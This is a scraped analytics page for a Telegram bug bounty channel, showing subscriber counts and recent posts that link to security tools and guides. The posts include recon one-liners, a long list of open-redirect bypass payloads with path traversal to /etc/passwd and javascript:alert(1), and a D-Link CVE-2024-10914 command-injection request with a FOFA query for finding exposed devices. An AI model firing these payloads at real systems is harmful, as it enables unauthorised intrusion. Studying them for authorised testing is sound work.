uz
Feedback
Bug Bounty

Bug Bounty

Kanalga Telegram’da oā€˜tish

Bugbounty Resources • Tips • Security Zines • Writeups • Vulnerability Update • Notes • Mindmaps • Cheatsheets • Checklists • Article / Blogs • PDFs • ebooks •

Ko'proq ko'rsatish
9 446
Obunachilar
Ma'lumot yo'q24 soatlar
-37 kunlar
-6030 kunlar

Ma'lumot yuklanmoqda...

Taglar buluti
Ma'lumot yo'q
Muammo bormi? Iltimos, sahifani yangilang yoki bizning qo'llab-quvvatlash boshqaruvchimizga murojaat qiling>.
Kirish va chiqish esdaliklari
---
---
---
---
---
---
Obunachilarni jalb qilish
Iyun '25
Iyun '25
+23
0 kanalda
May '25
+31
0 kanalda
Get PRO
Aprel '25
+31
0 kanalda
Get PRO
Mart '25
+44
0 kanalda
Get PRO
Fevral '25
+31
0 kanalda
Get PRO
Yanvar '25
+35
0 kanalda
Get PRO
Dekabr '24
+47
0 kanalda
Get PRO
Noyabr '24
+479
0 kanalda
Get PRO
Oktabr '24
+372
0 kanalda
Get PRO
Sentabr '24
+67
0 kanalda
Get PRO
Avgust '24
+352
1 kanalda
Get PRO
Iyul '24
+568
0 kanalda
Get PRO
Iyun '24
+207
1 kanalda
Get PRO
May '24
+356
2 kanalda
Get PRO
Aprel '24
+233
1 kanalda
Get PRO
Mart '24
+159
0 kanalda
Get PRO
Fevral '24
+142
1 kanalda
Get PRO
Yanvar '24
+531
0 kanalda
Get PRO
Dekabr '23
+486
0 kanalda
Get PRO
Noyabr '23
+126
0 kanalda
Get PRO
Oktabr '23
+188
0 kanalda
Get PRO
Sentabr '23
+95
0 kanalda
Get PRO
Avgust '23
+184
0 kanalda
Get PRO
Iyul '23
+581
0 kanalda
Get PRO
Iyun '23
+79
0 kanalda
Get PRO
May '23
+239
0 kanalda
Get PRO
Aprel '23
+88
0 kanalda
Get PRO
Mart '23
+155
0 kanalda
Get PRO
Fevral '23
+665
0 kanalda
Get PRO
Yanvar '23
+784
0 kanalda
Get PRO
Dekabr '22
+1 254
0 kanalda
Get PRO
Noyabr '22
+2 347
0 kanalda
Get PRO
Oktabr '22
+565
0 kanalda
Sana
Obunachilarni jalb qilish
Esdaliklar
Kanallar
21 Iyun+1
20 Iyun+1
19 Iyun0
18 Iyun+2
17 Iyun+1
16 Iyun0
15 Iyun+2
14 Iyun+3
13 Iyun+1
12 Iyun0
11 Iyun0
10 Iyun0
09 Iyun0
08 Iyun+2
07 Iyun+1
06 Iyun+2
05 Iyun0
04 Iyun+2
03 Iyun0
02 Iyun+1
01 Iyun+4
Kanal postlari
šŸš€ Exciting News for #InfoSec & #BugBounty! šŸ›” ProxSec v1.0.0 is out—an open-source extension for security pros! šŸ”„ āœ… Proxy m
šŸš€ Exciting News for #InfoSec & #BugBounty! šŸ›” ProxSec v1.0.0 is out—an open-source extension for security pros! šŸ”„ āœ… Proxy management āœ… Scope validation āœ… Program tracking āœ… Lightweight & private Open-Source : https://github.com/aacle/ProxSec Feedback welcome! šŸ’¬

2
šŸ”–The ultimate 403 Bypass wordlists and tester notes by JHaddix šŸ“± Github: šŸ”— Link
šŸ”–The ultimate 403 Bypass wordlists and tester notes by JHaddix šŸ“± Github: šŸ”— Link
0
3
TOP_100_Vulnerabilities_Step_by_Step_Guide_Handbook.pdf
0
4
šŸ”– Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to b
šŸ”– Dnsbruter - A powerful tool for active subdomain enumeration and discovery. ✨ Features: Dnsbruter uses DNS resolution to bruteforce and identify subdomains efficiently. Its multithreading capability allows users to control concurrency for faster and more effective results. Perfect for researchers and pen testers targeting domain reconnaissance. šŸ”— https://github.com/RevoltSecurities/Dnsbruter/
0
5
bounty_tips_100+.pdf
0
6
āš”ļøWant to download 100+ Bug Bounty Tips collected from X? āœ…Download the PDF from here #BugBounty #bugbountytips
0
7
āš”ļøWant to download 100+ Bug Bounty Tips collected from X? āœ…Download the PDF from here - https://t.me/brutsecurity/767 #BugBounty #bugbountytips
0
8
bounty_tips_100+.pdf
0
9
Extract all endpoints from a JS File and take your bug šŸž āœ…Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o
Extract all endpoints from a JS File and take your bug šŸž āœ…Method one waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]? 15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\. (get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ] {5,})\"" | awk -F "['|"]" '{print $2}' sort -fu āœ…Method two cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt #infosec #cybersec #bugbountytips
0
10
šŸ” gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches. šŸ”—https://github.com/gwen001/gitlab-subdoma
šŸ” gitlab-subdomains - A Go-based tool to uncover subdomains via GitLab searches. šŸ”—https://github.com/gwen001/gitlab-subdomains
0
11
https://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b
0
12
šŸ”–Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities āœ…https://github.com/rootDR/e
šŸ”–Ex-param - an automated tool designed for finding reflected parameters for XSS vulnerabilities āœ…https://github.com/rootDR/ex-param
0
13
šŸ”–AWS penetration testing: A step-by-step Guide for Beginners ā˜„ļøhttps://www.hackthebox.com/blog/aws-pentesting-guide+1
šŸ”–AWS penetration testing: A step-by-step Guide for Beginners ā˜„ļøhttps://www.hackthebox.com/blog/aws-pentesting-guide
0
14
https://github.com/harsh-bothra/learn365/blob/main/days/day5.md
https://github.com/harsh-bothra/learn365/blob/main/days/day5.md
0
15
ā˜„ļøYou can try this effective manual openredirect Bypassā˜„ļø 1. Null-byte injection: Ā Ā  - /google.com%00/ Ā Ā  - //google.com%00 Ā  2. Base64 encoding variations: Ā Ā  - aHR0cDovL2dvb2dsZS5jb20= Ā Ā  - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ== Ā Ā  - //base64:d3d3Lmdvb2dsZS5jb20=/ Ā  3. Case-sensitive variations: Ā Ā  - //GOOGLE.com/ Ā Ā  - //GoOgLe.com/ 4. Overlong UTF-8 sequences: Ā Ā  - %C0%AE%C0%AE%2F (overlong encoding for ../) Ā Ā  - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes: Ā Ā  - /%68%74%74%70://google.com Ā Ā  - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D Ā Ā  - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations: Ā Ā  - //google.com@127.0.0.1/ Ā Ā  - //127.0.0.1.xip.io/ Ā Ā  - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters: Ā Ā  - //google.com/#/ Ā Ā  - //google.com/;&/ Ā Ā  - //google.com/?id=123&// 8. Octal IP address format: Ā Ā  - http://0177.0.0.1/ Ā Ā  - http://00177.0000.0000.0001/ 9. IP address variants: Ā Ā  - http://3232235777 (decimal notation of an IP) Ā Ā  - http://0xC0A80001 (hex notation of IP) Ā Ā  - http://192.168.1.1/ 10. Path traversal with encoding: Ā Ā Ā  - /..%252f..%252f..%252fetc/passwd Ā Ā Ā  - /%252e%252e/%252e%252e/%252e%252e/etc/passwd Ā Ā Ā  - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion: Ā Ā Ā  - ftp://google.com/ Ā Ā Ā  - javascript:alert(1)//google.com 12. Protocol-relative URLs: Ā Ā Ā  - :////google.com/ Ā Ā Ā  - :///google.com/ 13. Redirection edge cases: Ā Ā Ā  - //google.com/?q=//bing.com/ Ā Ā Ā  - //google.com?q=https://another-site.com/ 14. IPv6 notation: Ā Ā Ā  - http://[::1]/ Ā Ā Ā  - http://[::ffff:192.168.1.1]/ Ā Ā Ā  15. Double URL encoding: Ā Ā Ā  - %252f%252fgoogle.com (encoded twice) Ā Ā Ā  - %255cgoogle.com 16. Combined traversal & encoding: Ā Ā Ā  - /%2E%2E/%2E%2E/etc/passwd Ā Ā Ā  - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based: Ā Ā Ā  - https://google.com.reverselookup.com Ā Ā Ā  - //lookup-reversed.google.com/ 18. Non-standard ports: Ā Ā Ā  - http://google.com:81/ Ā Ā Ā  - https://google.com:444/ 19. Unicode obfuscation in paths: Ā Ā Ā  - /%E2%80%8Egoogle.com/ Ā Ā Ā  - /%C2%A0google.com/ 20. Query parameters obfuscation: Ā Ā Ā  - //google.com/?q=http://another-site.com/ Ā Ā Ā  - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo: Ā Ā Ā  - https://admin:password@google.com/ Ā Ā Ā  - http://@google.com 22. Combination of userinfo and traversal: Ā Ā Ā  - https://admin:password@google.com/../../etc/passwd
0
16
āš”ļøuro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate con
āš”ļøuro - Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that. šŸ”—github.com/s0md3v/uro
0
17
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&amp;name=%27;;%27 FOFA:app =D_Link-DNS-Share
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc #IoT
0
18
āš ļø S3 Bucket Recon āš ļø Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20
āš ļø S3 Bucket Recon āš ļø Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
0
19
Hey everyone! 🌟 Hope you’re all doing well in your current phase. I’m looking for a skilled React Native developer to join us and help mitigate some ongoing challenges. If you’re interested or know someone who might be a great fit, please reach out to me at @rootxabhishek. Thanks!
0
20
https://tagmango.com/web/checkout/671a883165626b7204a59a11 Use the coupon code HACKER30 to unlock a 30% discount, exclusively available for the first 100 customers! Don’t miss out—grab your deal now!
0